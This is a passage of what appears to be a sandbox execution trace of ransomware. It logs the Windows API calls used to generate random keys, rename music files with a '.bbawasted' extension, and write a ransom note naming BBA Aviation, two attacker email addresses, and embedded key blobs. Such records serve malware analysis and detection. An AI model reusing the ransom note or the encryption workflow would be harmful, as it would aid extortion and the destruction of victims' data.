THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]fZI86MOk55URIWWxzwBQ0CUm4TN8k/FO6o4SZMVqm5r8wYHcNmMfw4BPyegV9EO2\r\nH/MhAUIP+sJBWtBXHjDD8rH+e/SA9Qrt9MWrsrezZxpwXcT/xcpo11smG4CwoCEW\r\ngV6CDbPVjB+dx0BtdiUK7TK+kQjL+lSWQWq6hctq680dLqo6OejV+G2OHlL8Dj6J\r\nGA3VhSwPpYMzMCeO66ZQaymyEfDAmMvvmmjewAXa56qkckSKTlUC0GfEhL92FmpA\r\nncs49fxFQyo7gSG5B5QHjntckLUztSwZTiNz/oyetO+Zr3drG2yfFDtJXNkAmtAQ\r\nnOTsuzji++mCPtD/LHwlSpdQff6nnQTquJm6aAO/ApCxnWeY8l8Lc0zS9BRMN7fN\r\nGKfO+2xqvZWWFGiuj8SIL81jqnA0f1qX7lSKbIn9s1VB0yIPfzeRMmizH6AVPGnF\r\nBVsxmLv+dWTUZFNfOGhMf0FJQlPKaZiKgod/K2WtFlV68fOqLRQWq7dl8uedzgzc\r\n1vNJ7AWoYQr6AtjZMYQ+igD9GHIRuC6KI78iXKNDouxIgpFi2JVkKQv3tIf4BsGJ\r\nYqcVk6/zBatDdGKmI5YVRijAhTH9tHgkp4unv8k7t5muJUnNCSRJIA7HJPPeYmwA\r\nbZ2BwSdYnrzdZeic5TTgm/bbxntfYTQvQW2WuwNlbbZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0222.986] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0222.986] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0222.986] SetEndOfFile (hFile=0x28c) returned 1 [0222.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.989] CloseHandle (hObject=0x28c) returned 1 [0222.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0222.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8920 | out: hHeap=0x660000) returned 1 [0222.989] _aulldvrm () returned 0x0 [0222.989] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0222.990] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0222.990] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0222.990] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p-bIUNC05.wav") returned 53 [0222.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6bc8e0 [0222.990] lstrcpyW (in: lpString1=0x6bc94a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0222.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0222.990] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a69b0) returned 1 [0222.991] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0222.991] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0222.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p-bIUNC05.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p-biunc05.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0222.992] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0222.993] SetEndOfFile (hFile=0x28c) returned 1 [0222.993] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0222.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0222.993] lstrcpyW (in: lpString1=0x6bc94a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0222.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p-bIUNC05.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p-biunc05.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p-bIUNC05.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p-biunc05.wav.bbawasted")) returned 1 [0222.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p-bIUNC05.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p-biunc05.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0222.994] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0222.995] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xb2e6 [0222.995] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb2e6) returned 0x5f0000 [0222.995] CloseHandle (hObject=0x27c) returned 1 [0222.997] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0222.998] CloseHandle (hObject=0x288) returned 1 [0222.998] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0222.998] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0222.998] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0222.998] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0222.999] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0222.999] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0222.999] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0223.009] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0223.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.010] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QJ+XNBF3+xKQodCAzkZgzZbT64YUa3WWq14+Vm5df70BbCfZ46EQhD4TTRFO96hv\r\nJGlWKdhA6SoN4G7sH7+hAjHKMsgUrJGZGMgYR47NpU4Ye1cC19347cHXc9CNRVbU\r\n2tBbYLTZaas4cyD4CTnEvUUPeTHeRII9GiE6aKt5qahT7Eqb5uiIDTPWe0An0Ayi\r\nDLERP0E4bzQbvkheWhbJyyzXFVJYXtgfN5TO6eC12GCL8uXpnWOLyYZtpBjLA22F\r\n3W65LhFu7LiZBsxy+eyPmHK4C5GP9iJ+qM8wBWbDcDSA8tZZuCkZqGwtXmZT0o0d\r\nWzrkF7jHTHBNNiY8ZqE9dAeUGVWhukx+DSWrScM8MGaKQZLpBx2p2rUl6H9zMk3b\r\nC4yqw/Ie8KmmuIiSTf6I/QLE8fXYUJUE/8lzvxXkrUlZExYf6SnLDdY0NjgVQWQm\r\nHl54M/+mL692KHvERobXppYAacky0FLeHMLyZffm3dI/1O/a0sYeHhcILtEl/iV/\r\n5br7TW2bHzRRXmXYk8iU6coV6HQgsjjf+iYL9AASuCrrOwEFao15eYcdrDQrZfoy\r\nBdr6xpT6BrhDs/t/UXmUdfi7tm+DFL3KaDeFuI09mS/nN+qQKs4DfGRyetBxBKN1\r\n/BQdJ/GcLAsoc3Ig9jP4BMRyR01usJ4/nQNRXqYZT80=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0223.010] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0223.010] SetEndOfFile (hFile=0x28c) returned 1 [0223.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.013] CloseHandle (hObject=0x28c) returned 1 [0223.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0223.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7090 | out: hHeap=0x660000) returned 1 [0223.014] _aulldvrm () returned 0x0 [0223.014] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a60a8) returned 1 [0223.015] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.015] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0223.015] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p31gf56S.mp3") returned 52 [0223.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6bc8e0 [0223.015] lstrcpyW (in: lpString1=0x6bc948, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.015] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0223.016] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.016] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0223.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p31gf56S.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p31gf56s.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.017] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.018] SetEndOfFile (hFile=0x28c) returned 1 [0223.018] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.018] lstrcpyW (in: lpString1=0x6bc948, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.018] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p31gf56S.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p31gf56s.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p31gf56S.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p31gf56s.mp3.bbawasted")) returned 1 [0223.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\p31gf56S.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\p31gf56s.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0223.020] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0223.020] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xab32 [0223.020] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab32) returned 0x5f0000 [0223.020] CloseHandle (hObject=0x288) returned 1 [0223.022] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0223.023] CloseHandle (hObject=0x27c) returned 1 [0223.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0223.023] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0223.024] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0223.024] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0223.024] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0223.024] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0223.024] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0223.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0223.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0223.225] _snwprintf (in: _Dest=0x6bb470, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]FNUATtN3x17prn3UcZLJbosetupmLtitY74cdJgCq6PuC9R9/9mVfnnp8SClRHI1\r\nFZlPYUiiZbagxLTPqkCWHLf9h2UhqL8tPcX918IxbpHk0MlZ53Lm15YeZtlXggY2\r\nwXzYY8hVeJlvNzFjcA+I1sBGgdjwcy3VMFKsfs0dH3PjkjDbzBesxJKdOQLN940I\r\nRKHtTlCs8fp+O+6cCteld32Wl0e5Q/aID7jbqZzoKuCb4MY8wlMF9Su0FS2vzRtc\r\nkIpNTtEJEAziSKXqThe7FbGWsaPIUhLhmSm2QOuTAZspmzH8LYkkmwUo/GVj+S99\r\nJjchZ8270YBxaufBnLqNC8QYTVazNIlKLtVhi5WfEvnXYphGm3xkvz9mnGxMpGB4\r\nLr7HrHrppstr6lQClItE9E2eLyyL4HzUxUzF4l/g8KVFtzITzE1PnUv/TqCZzDjS\r\niSV8VUUiWz6GE9ypXTwGWi7PKUcH23lGMA+P7m5ZQE3eu6hWuFhxEXMucS1JlTub\r\nBhz0E1RAIf4ACY2edMmwko9sMUaazm59XdCTb4gCyBuyqfFKZVgVsKzuGkrwQgdF\r\nZ0IwRvO5StZNTy1n7dxCKjsMmUz9CjEGhKMWkXfHN55Gc2h7Fz7kBI4vFS+wC/B1\r\nYCzjzzj8JC90OOhH9DBo7rEQ0EP/uMkD1LLHtMlUNwN=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0223.226] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0223.226] SetEndOfFile (hFile=0x28c) returned 1 [0223.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0223.359] CloseHandle (hObject=0x28c) returned 1 [0223.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0223.360] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b6d70 | out: hHeap=0x660000) returned 1 [0223.360] _aulldvrm () returned 0x0 [0223.360] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0223.360] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0223.361] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0223.361] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\YAPXFzlUje9gszg6HyC.m4a") returned 49 [0223.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a17c0 [0223.361] lstrcpyW (in: lpString1=0x6a1822, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0223.361] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.361] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6c58) returned 1 [0223.362] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0223.362] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0223.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\YAPXFzlUje9gszg6HyC.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\yapxfzluje9gszg6hyc.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0223.362] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0223.363] SetEndOfFile (hFile=0x28c) returned 1 [0223.364] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0223.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.364] lstrcpyW (in: lpString1=0x6a1822, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0223.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\YAPXFzlUje9gszg6HyC.m4a" (normalized: "c:\\users\\fd1hvy\\music\\yapxfzluje9gszg6hyc.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\YAPXFzlUje9gszg6HyC.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\yapxfzluje9gszg6hyc.m4a.bbawasted")) returned 1 [0223.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\YAPXFzlUje9gszg6HyC.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\yapxfzluje9gszg6hyc.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0223.369] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0223.369] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xeed8 [0223.370] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeed8) returned 0x5f0000 [0223.370] CloseHandle (hObject=0x288) returned 1 [0223.372] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0223.373] CloseHandle (hObject=0x280) returned 1 [0223.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6bdcf0 [0223.373] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a60a8) returned 1 [0223.374] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x1b8, pbBuffer=0x6bdd38 | out: pbBuffer=0x6bdd38) returned 1 [0223.374] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0223.374] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0223.375] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0223.375] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0223.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0223.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0223.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0223.386] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nPCdjN1jCeVubg+PJqHzzGhTyr+7jFDU0HV3Bo3ziE+11xRQE1qX8LrCWY0E9LZn\r\ntMIuSf/717DvqlnGKoxCOAP/A6ct52EkGFGpQBProtltRJbWtld22+o7Ga//U/9V\r\nQeN5PplN8gxQ9m0itCbvoisZyrlyeV3zjUWq6mdxfnhtarmd3ivFJQweKQoHBWUk\r\nLc3nSbPeA12RHK+gWOWxcdW89imef1tI4dW2WWYbjeZALK2z3cEMJowW3btS6E4X\r\nNeue2MUBN1fhsUHPx66CZVsnYEOksEQPacnaisLZM5sFOfybdodedn8vBB55YiMq\r\nAvS/zkDlMjmzNrkHyHjZ+XD97sqIFk1LxL9LeW47jGWKL7J3siE2soZtjNYauq0y\r\nPDjGoZjKaBbrTK9f6ltIVcV+c6jQSee+EIIFzRSuKWMc7BgcCFLWuHf8s3Dr7qRb\r\n5eUevAX7kKbPstLv0HIGNvF8ffokC/w4bdA1ptpohZuTUcDAaaJ7jDLR1hhW8Fta\r\ncPlWtEAba3KUUWlodkeVjba9xfq626KFx14ViEbcs4ciDgnRUg0KtPdSRVp/q0dG\r\n6T6/VkPVC5E42ISV+AviBQeX1DF7XDG2WMaqlVeYn6szKTCTcXNlhcp0kywvFgwX\r\nvqSQEs60D4SY1+KCXVDt1RH0ZwswT0ZuOBisNbW3ZiC=[end_key]\r\nKEEP IT\r\n") returned 984 [0223.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0223.386] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0223.387] SetEndOfFile (hFile=0x28c) returned 1 [0223.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0223.389] CloseHandle (hObject=0x28c) returned 1 [0223.389] HeapFree (in: hHeap=0x660000, 